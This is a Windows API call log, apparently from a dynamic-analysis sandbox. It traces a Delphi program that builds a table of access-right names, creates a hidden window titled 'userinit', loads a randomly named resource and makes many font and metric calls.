[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e210*="PRINTER_ALL_ACCESS") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e200*="DELETE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e1f0*="READ_CONTROL") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e1e0*="WRITE_OWNER") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e1d0*="WRITE_DAC") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a3e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a3e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a3e1a0*="SC_MANAGER_LOCK") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a3e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a3e180*="SC_MANAGER_CONNECT") returned 1
[0090.546] SysReAllocStringLen (in: pbstr=0x2a3e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a3e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a3e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e140*="STANDARD_RIGHTS_WRITE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e130*="STANDARD_RIGHTS_READ") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e120*="STANDARD_RIGHTS_ALL") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e110*="DELETE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e100*="READ_CONTROL") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e0f0*="WRITE_OWNER") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e0e0*="WRITE_DAC") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a3e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a3e0c0*="SERVICE_STOP") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a3e0b0*="SERVICE_START") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a3e0a0*="SERVICE_QUERY_STATUS") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a3e090*="SERVICE_QUERY_CONFIG") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a3e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a3e070*="SERVICE_INTERROGATE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a3e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a3e050*="SERVICE_CHANGE_CONFIG") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e040*="SERVICE_ALL_ACCESS") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e020*="STANDARD_RIGHTS_WRITE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e010*="STANDARD_RIGHTS_READ") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e000*="STANDARD_RIGHTS_ALL") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3dff0*="DELETE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3dfe0*="READ_CONTROL") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3dfd0*="WRITE_OWNER") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dfc0*="WRITE_DAC") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a3dfb0*="KEY_SET_VALUE") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a3dfa0*="KEY_CREATE_LINK") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a3df90*="KEY_CREATE_SUB_KEY") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a3df80*="KEY_NOTIFY") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a3df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0090.547] SysReAllocStringLen (in: pbstr=0x2a3df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a3df60*="KEY_QUERY_VALUE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3df40*="STANDARD_RIGHTS_WRITE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a3df30*="STANDARD_RIGHTS_READ 2") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a3df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3df10*="DELETE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3df00*="READ_CONTROL") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3def0*="WRITE_OWNER") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dee0*="WRITE_DAC") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a3ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a3dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a3deb0*="DESKTOP_JOURNALRECORD") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a3dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a3de90*="DESKTOP_HOOKCONTROL") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a3de80*="DESKTOP_CREATEWINDOW") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a3de70*="DESKTOP_CREATEMENU") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a3de60*="DESKTOP_READOBJECTS") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a3de50*="DESKTOP_ENUMERATE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3de30*="STANDARD_RIGHTS_WRITE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3de20*="STANDARD_RIGHTS_READ") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3de10*="STANDARD_RIGHTS_ALL") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3de00*="DELETE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ddf0*="READ_CONTROL") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3dde0*="WRITE_OWNER") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ddd0*="WRITE_DAC") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a3ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a3ddb0*="WINSTA_READSCREEN") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a3dda0*="WINSTA_READATTRIBUTES") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a3dd90*="WINSTA_EXITWINDOWS") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a3dd80*="WINSTA_ENUMERATE") returned 1
[0090.548] SysReAllocStringLen (in: pbstr=0x2a3dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a3dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a3dd60*="WINSTA_CREATEDESKTOP") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a3dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a3dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3dd10*="STANDARD_RIGHTS_READ") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a3dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3dcf0*="READ_CONTROL") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a3dce0*="SI_ACCESS_SPECIFIC") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dcd0*="WRITE_DAC") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a3dcc0*="FILE_DELETE") returned 1
[0090.549] SysReAllocStringLen (in: pbstr=0x2a3dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a3dcb0*="FILE_DELETE_CHILD") returned 1
[0090.549] GetDeviceCaps (hdc=0x2b010799, index=12) returned 32
[0090.549] GetDeviceCaps (hdc=0x2b010799, index=14) returned 1
[0090.549] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.549] LoadStringA (in: hInstance=0x2950000, uID=0xfeed, lpBuffer=0x14f3f4, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf
[0090.549] CharLowerBuffA (in: lpsz="jpeg", cchLength=0x4 | out: lpsz="jpeg") returned 0x4
[0090.549] LoadStringA (in: hInstance=0x2950000, uID=0xfeed, lpBuffer=0x14f3f4, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf
[0090.549] CharLowerBuffA (in: lpsz="jpg", cchLength=0x3 | out: lpsz="jpg") returned 0x3
[0090.550] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0090.550] GetProcAddress (hModule=0x757b0000, lpProcName="IsHungAppWindow") returned 0x757e7195
[0090.550] GetProcAddress (hModule=0x757b0000, lpProcName="HungWindowFromGhostWindow") returned 0x757d61f5
[0090.550] GetProcAddress (hModule=0x757b0000, lpProcName="GhostWindowFromHungWindow") returned 0x757ba561
[0090.550] GetClassInfoA (in: hInstance=0x2950000, lpClassName="TApplication", lpWndClass=0x14f81c | out: lpWndClass=0x14f81c) returned 0
[0090.550] RegisterClassA (lpWndClass=0x2a3cf00) returned 0x1bc160
[0090.550] GetSystemMetrics (nIndex=0) returned 1440
[0090.550] GetSystemMetrics (nIndex=1) returned 900
[0090.550] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x2950000, lpParam=0x0) returned 0x301a8
[0090.551] SetWindowLongA (hWnd=0x301a8, nIndex=-4, dwNewLong=2232290) returned 43348024
[0090.588] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0090.588] SendMessageA (hWnd=0x301a8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0090.588] DefWindowProcA (hWnd=0x301a8, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0090.589] DefWindowProcA (hWnd=0x301a8, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x1020d
[0090.589] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0090.589] SetClassLongA (hWnd=0x301a8, nIndex=-14, dwNewLong=65575) returned 0x0
[0090.589] GetSystemMenu (hWnd=0x301a8, bRevert=0) returned 0x10213
[0090.590] DeleteMenu (hMenu=0x10213, uPosition=0xf030, uFlags=0x0) returned 1
[0090.590] DeleteMenu (hMenu=0x10213, uPosition=0xf000, uFlags=0x0) returned 1
[0090.590] DeleteMenu (hMenu=0x10213, uPosition=0xf010, uFlags=0x0) returned 1
[0090.590] GetCurrentThreadId () returned 0xf54
[0090.590] ResetEvent (hEvent=0xa0) returned 1
[0090.590] GetCurrentThreadId () returned 0xf54
[0090.590] GetCurrentThreadId () returned 0xf54
[0090.590] GetCurrentThreadId () returned 0xf54
[0090.590] ResetEvent (hEvent=0xa0) returned 1
[0090.590] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f644, fWinIni=0x0 | out: pvParam=0x14f644) returned 1
[0090.590] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f644, fWinIni=0x0 | out: pvParam=0x14f644) returned 1
[0090.590] GetSystemMetrics (nIndex=49) returned 16
[0090.590] GetSystemMetrics (nIndex=50) returned 16
[0090.590] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f68c, fWinIni=0x0 | out: pvParam=0x14f68c) returned 1
[0090.591] IsWindowVisible (hWnd=0x301a8) returned 0
[0090.591] GetCurrentThreadId () returned 0xf54
[0090.591] VirtualQuery (in: lpAddress=0x2a11668, lpBuffer=0x14f55c, dwLength=0x1c | out: lpBuffer=0x14f55c*(BaseAddress=0x2a11000, AllocationBase=0x2950000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0090.591] FindResourceA (hModule=0x2950000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a58990
[0090.591] FindResourceA (hModule=0x2950000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a58990
[0090.591] LoadResource (hModule=0x2950000, hResInfo=0x2a58990) returned 0x2a5f044
[0090.591] SizeofResource (hModule=0x2950000, hResInfo=0x2a58990) returned 0xca5
[0090.591] LockResource (hResData=0x2a5f044) returned 0x2a5f044
[0090.591] GetCurrentThreadId () returned 0xf54
[0090.591] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f310, fWinIni=0x0 | out: pvParam=0x14f310) returned 1
[0090.591] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f310, fWinIni=0x0 | out: pvParam=0x14f310) returned 1
[0090.591] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f310, fWinIni=0x0 | out: pvParam=0x14f310) returned 1
[0090.591] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x14f310, fWinIni=0x0 | out: pvParam=0x14f310) returned 1
[0090.592] GetDC (hWnd=0x0) returned 0x2b010799
[0090.593] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.593] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0090.594] CreateFontIndirectA (lplf=0x14f2ac) returned 0x500a0881
[0090.594] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.594] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.594] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.594] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.594] GetSystemMetrics (nIndex=6) returned 1
[0090.594] VirtualAlloc (lpAddress=0x2a74000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a74000
[0090.595] GetDC (hWnd=0x0) returned 0x2b010799
[0090.595] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.595] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.595] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.595] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.595] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.595] GetSystemMetrics (nIndex=6) returned 1
[0090.595] GetDC (hWnd=0x0) returned 0x2b010799
[0090.595] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.595] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.596] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.596] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.596] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.596] GetSystemMetrics (nIndex=6) returned 1
[0090.596] GetDC (hWnd=0x0) returned 0x2b010799
[0090.596] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.596] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.596] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.596] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.596] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.596] GetSystemMetrics (nIndex=6) returned 1
[0090.596] GetDC (hWnd=0x0) returned 0x2b010799
[0090.596] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f308 | out: lptm=0x14f308) returned 1
[0090.596] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.596] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f340 | out: lptm=0x14f340) returned 1
[0090.596] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.596] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.597] GetSystemMetrics (nIndex=6) returned 1
[0090.597] GetDC (hWnd=0x0) returned 0x2b010799
[0090.597] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f00c | out: lptm=0x14f00c) returned 1
[0090.597] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.597] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f044 | out: lptm=0x14f044) returned 1
[0090.597] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.597] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.597] GetSystemMetrics (nIndex=6) returned 1
[0090.597] GetDC (hWnd=0x0) returned 0x2b010799
[0090.597] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f308 | out: lptm=0x14f308) returned 1
[0090.597] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.597] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f340 | out: lptm=0x14f340) returned 1
[0090.597] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.597] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.597] GetSystemMetrics (nIndex=6) returned 1
[0090.597] GetDC (hWnd=0x0) returned 0x2b010799
[0090.597] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f00c | out: lptm=0x14f00c) returned 1
[0090.597] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.597] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f044 | out: lptm=0x14f044) returned 1
[0090.597] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.597] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.597] GetSystemMetrics (nIndex=6) returned 1
[0090.598] GetDC (hWnd=0x0) returned 0x2b010799
[0090.598] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f308 | out: lptm=0x14f308) returned 1
[0090.598] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.598] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f340 | out: lptm=0x14f340) returned 1
[0090.598] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.598] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.598] GetSystemMetrics (nIndex=6) returned 1
[0090.598] GetDC (hWnd=0x0) returned 0x2b010799
[0090.598] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f00c | out: lptm=0x14f00c) returned 1
[0090.598] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.598] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f044 | out: lptm=0x14f044) returned 1
[0090.598] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.598] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.598] GetSystemMetrics (nIndex=6) returned 1
[0090.599] GetDC (hWnd=0x0) returned 0x2b010799
[0090.599] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.599] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.599] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.599] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
[0090.599] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.599] GetSystemMetrics (nIndex=6) returned 1
[0090.599] GetDC (hWnd=0x0) returned 0x2b010799
[0090.599] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f2f4 | out: lptm=0x14f2f4) returned 1
[0090.599] SelectObject (hdc=0x2b010799, h=0x500a0881) returned 0x18a002e
[0090.599] GetTextMetricsA (in: hdc=0x2b010799, lptm=0x14f32c | out: lptm=0x14f32c) returned 1
[0090.599] SelectObject (hdc=0x2b010799, h=0x18a002e) returned 0x500a0881
